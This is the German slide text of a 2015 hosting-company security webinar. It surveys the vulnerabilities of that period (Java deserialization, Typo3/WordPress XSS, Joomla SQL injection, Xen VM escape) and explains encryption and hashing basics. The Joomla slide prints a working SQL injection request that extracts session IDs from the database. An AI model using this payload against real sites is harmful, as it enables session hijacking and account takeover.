Security-Webinar · Asymmetrische Verschlüsselung _Alice & Bob haben privaten und öffentlichen Schlüssel _Alice will mit Bob kommunizieren ... Vorschau _Nächster Termin: 09.12.2015

Security-WebinarNovember 2015

Dr. Christopher Kunz, filoo GmbH

Ihr Webinar-Team

_ Referent:Dr.ChristopherKunz_ CEOHostingfilooGmbH/TKAG_ PromotionITSecurity_ VorträgeaufKonferenzen_ AutorvonArtikeln&Büchern

_Moderation:SibylleBlöchl_MarketingThomas-Krenn.AG_ SammeltFragen/Feedback

Security-Webinar November 2015

filoo GmbH

_Wir sind die Hosting-Tochter der Thomas-Krenn.AG_ Sicheres, hochperformantes Hosting in Frankfurt_ Mitarbeiter in Gütersloh und Freyung

_ Primärer Rechenzentrumsstandort Frankfurt_ Tier3, ISO 27001_ Fläche in zwei Brandabschnitten

_Managed Services_ Planung & Deployment_ Security Services_ Systemadministration


Agenda

_ SecurityimOktober/November_ Java0days_ Safe-Harbourgekippt_ Security-BugsinTypo3/Wordpress_MalwareinXcode_ JoomlaSecurity_ Xen VM-Ausbruch

_ SchwerpunktthemaVerschlüsselung_ Verschlüsselungrichtignutzen– waswofür?_ VerschlüsselteE-Mailmitfiloo Webmail_ AktuelleSecurity-VorfällemitVerschlüsselung


Java 0days

_ SicherheitsprobleminbeliebterBibliothekssammlung_ „CommonCollections“_ ProbleminSerialisierungsroutinen

_ BetrifftvieleJava-(Server-)Anwendungen_ Weblogic_ WebSphere_ Jboss_ Jenkins_ OpenNMS

_ SehrdetaillierteBeschreibung:http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/


Safe Harbor gekippt

_ Safe-Harbor-Abkommenzw.EUundUSAgekippt_ NachKlageeinesÖsterreichersu.a.gegenFacebook

_ÜbertragungpersönlicherDateninUSAgrundrechtswidrig_ VerstoßgegenArt.7derEU-Charta

_ EinschätzungSchaar:KeineeinfacheLösung_ Sog.StandardvertragsklauselnundBindingCorporateRulesebenfallsgrundrechtswidrig_ ExpliziteEinwilligungdesNutzersvermutlichunwirksam_ EuropäischeServervonUS-UnternehmenebenfallsUS-Jurisdiktionunterworfen


Safe Harbor – und nun?

_ KundendatennichtinUSAspeichernundverarbeitenlassen_ GoogleDrive,Dropbox,Amazon..._ Salesforce_ Evernote

_Womöglich,aufEU-Speicherungbestehen_ EinigeAnbieterhabenWahlmöglichkeit_ Festlegungfordern!

_ Cloud-HostinginDeutschland_ ...gibt‘sbeifiloo!


XSS in Typo3, Wordpress

_ Cross-SiteScriptinginTypo3_ SpeziellpräparierterLinksinsBackendkannJSenthalten_ Besondersgefährlich:Administratoren/Redakteureangreifen_ Angreifbar:Typo36.2.0bis6.2.14,7.0.0bis7.3.0

_ XSSinWordpress_ VerarbeitungvonShortcodesangreifbar_ Nutzerkontenlisteauch

_ LückeimRechtesystem_ PrivatePostsöffentlichmachen_ Nutzerkontoerforderlich

_ Updateauf4.3.1dringendempfohlen


Malware in XCode

_ FieseLeutehabenMalwareinXcode eingebaut..._ ...unddanndiese(raubkopierte)VersioninChinaverteilt_ AberXcode istdochkostenlos?_ Ja,abernichtfreiinChinaverfügbar!

_DieseMalwarewirdinApp-Codeübertragen_ DieAppsführenunerwünschteAktionenaus_ Clipboardauslesen_ Phishing_ Allerdings(noch)inaktiv

_MehrereHundertchinesischeAppsbetroffen


Joomla SQL Injection

_ Seit22.10.neuerSQLInjection 0dayfürJoomla_ SeitdemauchmassiveExploitversuche_ Automatisierunginkl.False-Positive-Filter_ Betroffen:Joomla3.X(X<4.5)

_ /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1%20&list[select]=%20(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)


XEN VM-Ausbruch

_ LückeinSpeicherverwaltung fürXen-Gäste(VMs)_ Xen 3.4x86_ 32und64Bit

_Auswirkungen:AusbruchausVM_ KontrolledesHostsystems

_ (Wenig)mehrInfos:XSA-148_ http://xenbits.xen.org/xsa/advisory-148.html


Schwerpunkt Verschlüsselung_ SymmetrischeVerschlüsselung

_ EsexistierteinSchlüssel,denbeidevorabkennenmüssen_ AlleDatenwerdengegendiesenSchlüsselverschlüsselt_ Sehrschnell_ Verwendetu.a.inTLS

_

_AsymmetrischeVerschlüsselung_ JederNutzerhateinenöffentlichenundprivatenSchlüssel_MitdemöffentlichenSchlüsselwirdverschlüsselt_MitdemprivatenSchlüsselwirdentschlüsselt_ DeutlichlangsameralssymmetrischeKryptographie


Wofür welche Verschlüsselung?_ Transportverschlüsselung

_ IPSec_ SSL/TLS_ ...

_ Ende-zu-Ende-Verschlüsselung_ PGP/GnuPG_ S/MIME

_ TransparenteVerschlüsselung_ Crypto-Filesysteme_ Datenbankverschlüsselung(MariaDB,...)


Asymmetrische Verschlüsselung_Alice&BobhabenprivatenundöffentlichenSchlüssel_AlicewillmitBobkommunizieren

_ SiegibtBobihrenöffentlichenSchlüssel_ Bobgibtihrseinen

_AliceschreibtdieNachrichtundverschlüsseltsiemitBobsöffentlichemSchlüssel_ ErbrauchtseinenprivatenSchlüsselzumEntschlüsseln

_AlicesigniertdieNachrichtmitihremprivatenSchlüssel_ BobbrauchtihrenöffentlichenSchlüsselzumPrüfen


Verschlüsselung falsch

_ Belkin baut„smarte“LichtschalteraufLinuxbasis..._ ...undvergißt einenprivatenGPG-Schlüsseldarin_MitdiesemwardieFirmwaresigniert_ SomitkönnenAngreifereigeneFirmwares einspielen_ Exploits füreinenLichtschalter?

_D-LinkbautÜberwachungskamera..._ ...undvergißt einCode-Signing-ZertifikatnebstKey..._ SomitkönnenAngreiferWindows-SchadcodeinD-LinksNamenveröffentlichen_ Zertifikatbereitsrevoked


Verschlüsselung vs. Hashing_ Prüfsummen/Hashes sindKEINEVerschlüsselung!

_ EsgibttheoretischunendlichvieleKlartextefürdenselbenCiphertext_ One-Way-Funktion:EsgibtkeinenWegzurück

_HashfunktionenerfüllenzentraleAufgabeninCrypto_ DigitaleSignatur:HasheinesTexteswirdverschlüsselt_ModifiziereichdieOriginal-Nachricht,ändertderHashsich_ KannichdenselbenHashfürandereNachrichterzeugen?_ Ichkann.à Hash-Kollision


SHA1-Hashkollision

_ SHA-1istu.A. derHashalgorithmusfürvieleSSL-Zertifikate_ ErfolgreicherAngriffdurchbritischeForscher

_ Clustermit64GPUs

_MöglichepraktischeAuswirkung:GefälschteSSL-Zertifikate_ BesitzervonSHA-1-signiertenZertifikatensolltensietauschen_Meist(jenachCA)kostenlos


Sichere E-Mail

_ SichereE-MailwarletztenMonatThema_ Ichhabenochetwasnachgearbeitet...

_ Ende-zu-Ende-Verschlüsselungmuß imMail-Clientpassieren_ Sonstkannjemandmithören...

_DasgehtmitPGPundeinemBrowser-Plugin_ Funktioniertprimaimfiloo Webmailer!


Sichere E-Mail bei filoo


Vorschau

_NächsterTermin:09.12.2015

_ IchfreuemichaufIhreThemenvorschläge!


Vielen Dank

_ IchfreuemichaufIhreThemenvorschlägeundFragen!

_ Kontaktdaten:_ E-Mail:[email protected]_ Telefon:05241/86730-0

_ BesuchenSiefiloo!_ https://www.filoo.de/_ http://twitter.com/filoogmbh


Documents

Security-Webinar · Asymmetrische Verschlüsselung _Alice & Bob haben privaten und öffentlichen Schlüssel _Alice will mit Bob kommunizieren ... Vorschau _Nächster Termin: 09.12.2015